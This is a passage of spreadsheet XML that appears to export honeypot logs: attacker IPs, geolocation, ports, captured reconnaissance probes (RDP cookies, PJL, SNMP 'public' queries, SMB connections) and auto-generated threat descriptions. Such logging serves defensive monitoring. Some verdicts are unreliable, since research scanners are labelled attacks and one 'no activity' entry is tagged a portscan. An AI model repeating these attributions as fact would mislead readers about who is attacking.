(41.208.71.226,62466)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,49295)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,56933)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,56996)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64832)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64883)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,61402)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,61499)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,58928)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,59015)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:29d0:47e2</t>
  </si>
  <si>
    <t>1134fd8597f368632b02aea7e31efb34</t>
  </si>
  <si>
    <t>36.88.16.31</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;25384&amp;&amp;445&amp;&amp;59118&amp;&amp;NA</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Indonesia</t>
  </si>
  <si>
    <t>JK</t>
  </si>
  <si>
    <t>Jakarta</t>
  </si>
  <si>
    <t>Kota Administrasi Jakarta Pusat</t>
  </si>
  <si>
    <t>1642911</t>
  </si>
  <si>
    <t>-6.18104</t>
  </si>
  <si>
    <t>106.826</t>
  </si>
  <si>
    <t>7713</t>
  </si>
  <si>
    <t>Telekomunikasi Indonesia (PT)</t>
  </si>
  <si>
    <t>PT. Telekomunikasi Indonesia</t>
  </si>
  <si>
    <t>Telekomunikasi Indonesia</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,48913)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,49014)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59563)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59648)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44823)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44898)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,29818)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,29921)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,12583)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,16801)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,16862)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15611)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,36199)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,36303)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,18421)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,18488)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,40416)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,40490)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,12127)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15390)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15485)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,47579)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,47682)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,21754)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,21870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59824)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59888)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15120)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44363)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44443)}</t>
  </si>
  <si>
    <t>::ffff:2458:101f</t>
  </si>
  <si>
    <t>The attackers are performing reconnaissance and enumeration activities to identify potential vulnerabilities in the network. They are probing various services, including DNS, DHCP, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. &amp;&amp; An incoming suspicious connection from an unknown IP address is attempting to access SMB services. This may indicate an attempt to exploit or scan the system for vulnerabilities. Further investigation is required to determine the intentions of this activity. &amp;&amp; An incoming connection was made to an SMB service from IP address 36.88.16.31, potentially attempting unauthorized file access or data transfer. This could be a scanning activity or part of a larger malicious operation. The IP might be trying to exploit vulnerabilities in the SMB service.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; SMB Scanning &amp;&amp; SMB Attack</t>
  </si>
  <si>
    <t>7afa0caf9512896901fcb668489de0f6</t>
  </si>
  <si>
    <t>198.235.24.232</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_PJL_H2&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_MSSQL_H47&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;32328&amp;&amp;3306&amp;&amp;445&amp;&amp;1521&amp;&amp;143&amp;&amp;110&amp;&amp;389&amp;&amp;NA&amp;&amp;3389&amp;&amp;161&amp;&amp;5432&amp;&amp;6379&amp;&amp;50312&amp;&amp;56719&amp;&amp;9100&amp;&amp;57970&amp;&amp;1080&amp;&amp;57320&amp;&amp;53388&amp;&amp;1433&amp;&amp;23&amp;&amp;50065&amp;&amp;21&amp;&amp;57163&amp;&amp;56753&amp;&amp;52169&amp;&amp;49692&amp;&amp;57325&amp;&amp;5900&amp;&amp;80&amp;&amp;51313&amp;&amp;443</t>
  </si>
  <si>
    <t>2021-12-20</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash&amp;&amp;query&amp;&amp;request&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,58946)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EunmsKrPP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yVHpIW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yJuMqR'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xPyPrDOzn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ijDpLT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GVywjI'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,57612)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,57624)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,57630)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lOxHqzKSP'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cEkuaKsLE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fWNPbP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tlLEID'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63166)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63172)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63186)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sQVyydjYs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OPykuH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SIltXk'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ozdxEvqbu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KugpNm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cHwYoO'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63418)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63428)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63444)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FVglka'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:18e8</t>
  </si>
  <si>
    <t>Attempt to establish encrypted connection for authentication. Malicious actor likely attempting to exploit secure FTP login. Trying to authenticate via TLS encryption. &amp;&amp; Possible malicious activity: A client is attempting to use TLS encryption with an FTP server, which could be a phishing attempt or a way to evade detection. This suggests the attacker is trying to encrypt their communication for anonymity. The client is likely using this method to gain unauthorized access. &amp;&amp; The attacker is attempting to establish an encrypted connection using SSL, likely for malicious purposes such as unauthorized access or data theft. This suggests a possible attempt to bypass security measures by encrypting the communication. The attacker is trying to authenticate with the server. &amp;&amp; The attacker is attempting to establish an encrypted connection for FTP authentication, which may be a precursor to unauthorized file transfer or login attempts. This suggests potential malicious intent related to accessing or exploiting FTP service vulnerabilities. The use of SSL encryption may indicate an attempt to evade detection or monitoring. &amp;&amp; The system has detected an attempt to access IMAP services, indicating potential unauthorized access or scanning activity. The absence of data suggests that no login credentials were provided or the connection was not successful. This could be a reconnaissance phase by an attacker. &amp;&amp; This suggests a connection attempt to an IMAP service, specifically a CAPABILITY command which is typically used by clients to negotiate supported features with the server. This could be part of a reconnaissance or scanning activity. The lack of response from the server indicates no valid interaction was established. &amp;&amp; Unknown Redis service activity, possibly an attempt to access or interact with it without permission.
This could be related to unauthorized data retrieval or manipulation of cached data.
May indicate malicious intent to exploit or disrupt service functionality. &amp;&amp; This log indicates that there was an attempt to access a service but the SNMP protocol failed or is unavailable for this specific event. The lack of SNMP data suggests a potential issue with network communication or configuration for this particular interaction. &amp;&amp; Unauthorized access to a device's settings or configuration, potentially allowing malicious activity. The "public" community string suggests unsecured access. This could be a sign of reconnaissance.</t>
  </si>
  <si>
    <t>SSL Attack &amp;&amp; Tls Auth &amp;&amp; SSL Attack &amp;&amp; SSLS Attack &amp;&amp; Unknown Login &amp;&amp; SNMP Attack</t>
  </si>
  <si>
    <t>ffb75dc00e01393a73591530d7548d0a</t>
  </si>
  <si>
    <t>117.207.246.245</t>
  </si>
  <si>
    <t>Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>medium</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Bharat Sanchar Nigam Ltd</t>
  </si>
  <si>
    <t>::ffff:75cf:f6f5</t>
  </si>
  <si>
    <t>low&amp;&amp;medium</t>
  </si>
  <si>
    <t>5b24c61106221850ba56ec18c18e9e69</t>
  </si>
  <si>
    <t>87.236.176.171</t>
  </si>
  <si>
    <t>positive.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_MYSQL_H3&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_REDIS_H20&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;1080&amp;&amp;1433&amp;&amp;39369&amp;&amp;6667&amp;&amp;389&amp;&amp;1521&amp;&amp;9100&amp;&amp;5432&amp;&amp;110&amp;&amp;3306&amp;&amp;NA&amp;&amp;445&amp;&amp;443&amp;&amp;80&amp;&amp;25&amp;&amp;21&amp;&amp;3389&amp;&amp;23&amp;&amp;143</t>
  </si>
  <si>
    <t>2005-08-31</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;query&amp;&amp;NA&amp;&amp;command&amp;&amp;stshash&amp;&amp;request&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IRC:{'command': 'FOX.VERSION=S:1.0', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': 'ID=I:1', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': '};;', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}</t>
  </si>
  <si>
    <t>::ffff:57ec:b0ab</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit various services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and IRC. The attacker is using a variety of tools and techniques to attempt to gain unauthorized access, steal sensitive information, or disrupt service. &amp;&amp; Attempted login to IMAP service failed, possibly due to incorrect credentials or no activity at all. No valid commands were executed on this service. This may indicate a scanning activity or an attempt to exploit the service. &amp;&amp; The data indicates that an unknown entity is probing the IMAP service to discover available capabilities, possibly a reconnaissance step for further malicious activity. The CAPABILITY command is typically used by clients to request a list of supported features from the server. This behavior can be indicative of a potential scanning or vulnerability assessment attempt.</t>
  </si>
  <si>
    <t>Some specific findings include: &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>096348aab22b64118282fcae62d8f4e4</t>
  </si>
  <si>
    <t>171.224.70.139</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>VN</t>
  </si>
  <si>
    <t>Vietnam</t>
  </si>
  <si>
    <t>HN</t>
  </si>
  <si>
    <t>Hanoi</t>
  </si>
  <si>
    <t>Hoan Kiem</t>
  </si>
  <si>
    <t>1581130</t>
  </si>
  <si>
    <t>21.0278</t>
  </si>
  <si>
    <t>105.834</t>
  </si>
  <si>
    <t>7552</t>
  </si>
  <si>
    <t>Viettel Group</t>
  </si>
  <si>
    <t>Viettel Corporation</t>
  </si>
  <si>
    <t>VIETEL</t>
  </si>
  <si>
    <t>2011-03-04</t>
  </si>
  <si>
    <t>VIETTEL-VN</t>
  </si>
  <si>
    <t>::ffff:abe0:468b</t>
  </si>
  <si>
    <t>No suspicious activity detected as TELNET service is inactive. Normal operation of service without incoming connections. No malicious attempts were made to access this service. &amp;&amp; No TELNET activity detected, indicating potential evasion or lack of interest in this service. This could suggest that attackers are focusing on other services offered by the monitored system. Alternatively, it might indicate a misconfigured or inactive TELNET service.</t>
  </si>
  <si>
    <t>Portscan &amp;&amp; Portscan</t>
  </si>
  <si>
    <t>988b7d2fb2b7e2d46fedd67a2527abf6</t>
  </si>
  <si>
    <t>171.226.18.225</t>
  </si>
  <si>
